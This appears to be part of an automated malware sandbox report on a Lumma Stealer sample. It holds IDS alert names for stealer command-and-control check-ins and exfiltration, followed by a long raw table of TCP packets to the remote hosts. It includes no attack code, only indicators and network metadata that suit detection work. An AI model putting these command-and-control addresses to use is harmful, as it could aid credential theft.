                                                                                                                                                  2024-12-29T16:36:43.883961+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449739104.21.32.1443TCP
                                                                                                                                                  2024-12-29T16:36:44.615833+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449739104.21.32.1443TCP
                                                                                                                                                  2024-12-29T16:36:44.615833+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449739104.21.32.1443TCP
                                                                                                                                                  2024-12-29T16:36:45.933152+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449740104.21.32.1443TCP
                                                                                                                                                  2024-12-29T16:36:46.721563+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449740104.21.32.1443TCP
                                                                                                                                                  2024-12-29T16:36:46.721563+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449740104.21.32.1443TCP
                                                                                                                                                  2024-12-29T16:36:48.355991+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449742104.21.32.1443TCP
                                                                                                                                                  2024-12-29T16:36:50.668514+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449743104.21.32.1443TCP
                                                                                                                                                  2024-12-29T16:36:52.791981+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449744104.21.32.1443TCP
                                                                                                                                                  2024-12-29T16:36:55.581095+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449745104.21.32.1443TCP
                                                                                                                                                  2024-12-29T16:36:57.678094+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449746104.21.32.1443TCP
                                                                                                                                                  2024-12-29T16:36:58.495118+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449746104.21.32.1443TCP
                                                                                                                                                  2024-12-29T16:37:00.671379+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449747104.21.32.1443TCP
                                                                                                                                                  2024-12-29T16:37:04.245538+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449748104.21.32.1443TCP
                                                                                                                                                  2024-12-29T16:37:05.187085+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449748104.21.32.1443TCP
                                                                                                                                                  2024-12-29T16:37:07.586861+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449749185.161.251.21443TCP
                                                                                                                                                  2024-12-29T16:37:09.772266+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449750104.21.37.128443TCP
                                                                                                                                                  2024-12-29T16:37:10.699695+01002008438ET MALWARE Possible Windows executable sent when remote host claims to send a Text File1104.21.37.128443192.168.2.449750TCP
                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Dec 29, 2024 16:36:42.574093103 CET49739443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:42.574136019 CET44349739104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:42.574235916 CET49739443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:42.577653885 CET49739443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:42.577667952 CET44349739104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:43.883873940 CET44349739104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:43.883960962 CET49739443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:43.888956070 CET49739443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:43.888966084 CET44349739104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:43.889244080 CET44349739104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:43.940697908 CET49739443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:43.978873968 CET49739443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:43.978893995 CET49739443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:43.978981972 CET44349739104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:44.615849972 CET44349739104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:44.615942001 CET44349739104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:44.616000891 CET49739443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:44.617089987 CET49739443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:44.617106915 CET44349739104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:44.617120028 CET49739443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:44.617125034 CET44349739104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:44.623872995 CET49740443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:44.623904943 CET44349740104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:44.623982906 CET49740443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:44.624439955 CET49740443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:44.624452114 CET44349740104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:45.931574106 CET44349740104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:45.933151960 CET49740443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:45.933151960 CET49740443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:45.933178902 CET44349740104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:45.933373928 CET44349740104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:45.934750080 CET49740443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:45.934750080 CET49740443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:45.934814930 CET44349740104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:46.721560955 CET44349740104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:46.721616983 CET44349740104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:46.721648932 CET44349740104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:46.721678019 CET49740443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:46.721679926 CET44349740104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:46.721700907 CET44349740104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:46.721715927 CET49740443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:46.729788065 CET44349740104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:46.729868889 CET49740443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:46.729876041 CET44349740104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:46.738286972 CET44349740104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:46.738348961 CET49740443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:46.738369942 CET44349740104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:46.746853113 CET44349740104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:46.746898890 CET49740443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:46.746920109 CET44349740104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:46.800066948 CET49740443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:46.842361927 CET44349740104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:46.893940926 CET49740443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:46.893965960 CET44349740104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:46.935719967 CET44349740104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:46.935781002 CET49740443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:46.935786963 CET44349740104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:46.943474054 CET44349740104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:46.943511963 CET44349740104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:46.943533897 CET49740443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:46.943540096 CET44349740104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:46.943583965 CET49740443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:46.943588018 CET44349740104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:46.943613052 CET44349740104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:46.943654060 CET49740443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:46.948626041 CET49740443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:46.948638916 CET44349740104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:46.948651075 CET49740443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:46.948654890 CET44349740104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:47.014549971 CET49742443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:47.014604092 CET44349742104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:47.014677048 CET49742443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:47.014970064 CET49742443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:47.014981985 CET44349742104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:48.355925083 CET44349742104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:48.355990887 CET49742443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:48.357400894 CET49742443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:48.357409000 CET44349742104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:48.357608080 CET44349742104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:48.358797073 CET49742443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:48.359025002 CET49742443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:48.359054089 CET44349742104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:48.359110117 CET49742443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:48.359117031 CET44349742104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:49.387824059 CET44349742104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:49.387933016 CET44349742104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:49.387988091 CET49742443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:49.388112068 CET49742443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:49.388130903 CET44349742104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:49.405066013 CET49743443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:49.405122995 CET44349743104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:49.405214071 CET49743443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:49.405785084 CET49743443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:49.405798912 CET44349743104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:50.668437958 CET44349743104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:50.668514013 CET49743443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:50.758745909 CET49743443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:50.758769989 CET44349743104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:50.759013891 CET44349743104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:50.760845900 CET49743443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:50.761177063 CET49743443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:50.761205912 CET44349743104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:51.452562094 CET44349743104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:51.452666044 CET44349743104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:51.452714920 CET49743443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:51.452872038 CET49743443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:51.452888966 CET44349743104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:51.527668953 CET49744443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:51.527709961 CET44349744104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:51.527777910 CET49744443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:51.528062105 CET49744443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:51.528073072 CET44349744104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:52.791904926 CET44349744104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:52.791980982 CET49744443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:52.804691076 CET49744443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:52.804706097 CET44349744104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:52.804903984 CET44349744104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:52.806267023 CET49744443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:52.806389093 CET49744443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:52.806412935 CET44349744104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:52.806468010 CET49744443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:52.806477070 CET44349744104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:54.095802069 CET44349744104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:54.095911026 CET44349744104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:54.095995903 CET49744443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:54.096245050 CET49744443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:54.096263885 CET44349744104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:54.321820974 CET49745443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:54.321882010 CET44349745104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:54.321949005 CET49745443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:54.322290897 CET49745443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:54.322304010 CET44349745104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:55.580981970 CET44349745104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:55.581094980 CET49745443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:55.583412886 CET49745443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:55.583425045 CET44349745104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:55.583637953 CET44349745104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:55.584671021 CET49745443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:55.584753990 CET49745443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:55.584783077 CET44349745104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:56.359191895 CET44349745104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:56.359287977 CET44349745104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:56.359332085 CET49745443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:56.359505892 CET49745443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:56.359525919 CET44349745104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:56.371530056 CET49746443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:56.371576071 CET44349746104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:56.371639013 CET49746443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:56.371993065 CET49746443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:56.372008085 CET44349746104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:57.678010941 CET44349746104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:57.678093910 CET49746443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:57.679282904 CET49746443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:57.679291964 CET44349746104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:57.679512978 CET44349746104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:57.680685997 CET49746443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:57.680769920 CET49746443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:57.680774927 CET44349746104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:58.495116949 CET44349746104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:58.495213032 CET44349746104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:58.495263100 CET49746443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:58.547147989 CET49746443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:58.547178030 CET44349746104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:59.403192997 CET49747443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:59.403214931 CET44349747104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:36:59.403295040 CET49747443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:59.403599024 CET49747443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:36:59.403613091 CET44349747104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:00.671284914 CET44349747104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:00.671379089 CET49747443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:00.672449112 CET49747443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:00.672458887 CET44349747104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:00.672792912 CET44349747104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:00.673830032 CET49747443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:00.674496889 CET49747443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:00.674535990 CET44349747104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:00.674652100 CET49747443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:00.674690008 CET44349747104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:00.674798012 CET49747443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:00.674853086 CET44349747104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:00.674989939 CET49747443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:00.675014973 CET44349747104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:00.675163031 CET49747443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:00.675195932 CET44349747104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:00.675358057 CET49747443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:00.675386906 CET49747443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:00.675399065 CET44349747104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:00.675537109 CET49747443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:00.675576925 CET49747443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:00.719327927 CET44349747104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:00.719583988 CET49747443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:00.719629049 CET49747443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:00.719641924 CET49747443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:00.763335943 CET44349747104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:00.763545990 CET49747443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:00.763565063 CET49747443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:00.811342001 CET44349747104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:00.813555956 CET49747443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:00.855376005 CET44349747104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:00.917723894 CET44349747104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:00.919135094 CET49747443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:00.919173002 CET44349747104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:01.039361000 CET44349747104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:02.981817007 CET44349747104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:02.981941938 CET44349747104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:02.982002974 CET49747443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:02.982079983 CET49747443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:02.982096910 CET44349747104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:02.983490944 CET49748443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:02.983534098 CET44349748104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:02.983598948 CET49748443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:02.983984947 CET49748443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:02.983995914 CET44349748104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:04.245434999 CET44349748104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:04.245537996 CET49748443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:04.400356054 CET49748443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:04.400401115 CET44349748104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:04.400862932 CET44349748104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:04.401823997 CET49748443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:04.401845932 CET49748443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:04.401917934 CET44349748104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:05.187108994 CET44349748104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:05.187247038 CET44349748104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:05.187304020 CET49748443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:05.187438965 CET49748443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:05.187467098 CET44349748104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:05.187479973 CET49748443192.168.2.4104.21.32.1
                                                                                                                                                  Dec 29, 2024 16:37:05.187485933 CET44349748104.21.32.1192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:06.146125078 CET49749443192.168.2.4185.161.251.21
                                                                                                                                                  Dec 29, 2024 16:37:06.146230936 CET44349749185.161.251.21192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:06.146331072 CET49749443192.168.2.4185.161.251.21
                                                                                                                                                  Dec 29, 2024 16:37:06.146699905 CET49749443192.168.2.4185.161.251.21
                                                                                                                                                  Dec 29, 2024 16:37:06.146734953 CET44349749185.161.251.21192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:07.586769104 CET44349749185.161.251.21192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:07.586860895 CET49749443192.168.2.4185.161.251.21
                                                                                                                                                  Dec 29, 2024 16:37:07.588427067 CET49749443192.168.2.4185.161.251.21
                                                                                                                                                  Dec 29, 2024 16:37:07.588448048 CET44349749185.161.251.21192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:07.588655949 CET44349749185.161.251.21192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:07.589767933 CET49749443192.168.2.4185.161.251.21
                                                                                                                                                  Dec 29, 2024 16:37:07.631346941 CET44349749185.161.251.21192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:08.114804983 CET44349749185.161.251.21192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:08.114876986 CET44349749185.161.251.21192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:08.114937067 CET49749443192.168.2.4185.161.251.21
                                                                                                                                                  Dec 29, 2024 16:37:08.115113020 CET49749443192.168.2.4185.161.251.21
                                                                                                                                                  Dec 29, 2024 16:37:08.115134954 CET44349749185.161.251.21192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:08.115144968 CET49749443192.168.2.4185.161.251.21
                                                                                                                                                  Dec 29, 2024 16:37:08.115150928 CET44349749185.161.251.21192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:08.498627901 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:08.498687029 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:08.498760939 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:08.499093056 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:08.499109030 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:09.772190094 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:09.772265911 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:09.773827076 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:09.773874044 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:09.774106979 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:09.775352001 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:09.823338032 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:10.414047956 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:10.414092064 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:10.414114952 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:10.414136887 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:10.414160967 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:10.414165020 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:10.414184093 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:10.414192915 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:10.414195061 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:10.414217949 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:10.422336102 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:10.422713041 CET49750443192.168.2.4104.21.37.128
